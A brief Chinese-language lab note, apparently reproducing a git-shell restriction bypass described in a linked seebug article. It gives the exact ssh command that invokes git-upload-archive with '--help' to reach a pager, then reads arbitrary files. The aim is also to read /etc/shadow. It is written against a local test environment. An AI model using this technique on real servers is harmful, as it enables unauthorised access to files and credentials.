https://paper.seebug.org/309/https://paper.seebug.org/309/
开启环境
chmod 0600 id_rsa
正常连接其ssh服务ssh -p 3322 -i id_rsa git@127.0.0.1
,会被git-shell给拦截,返回错误fatal: unrecognized command ''
,并且连接被关闭。
使用--help技巧,连接目标并进入帮助页面:
ssh -p 3322 -i id_rsa -t git@127.0.0.1 "git-upload-archive '--help'"
按shift+e,读取任意文件:
测了一下,本机是kali 系统,不能直接读取shadow文件。欢迎给位测试其他的系统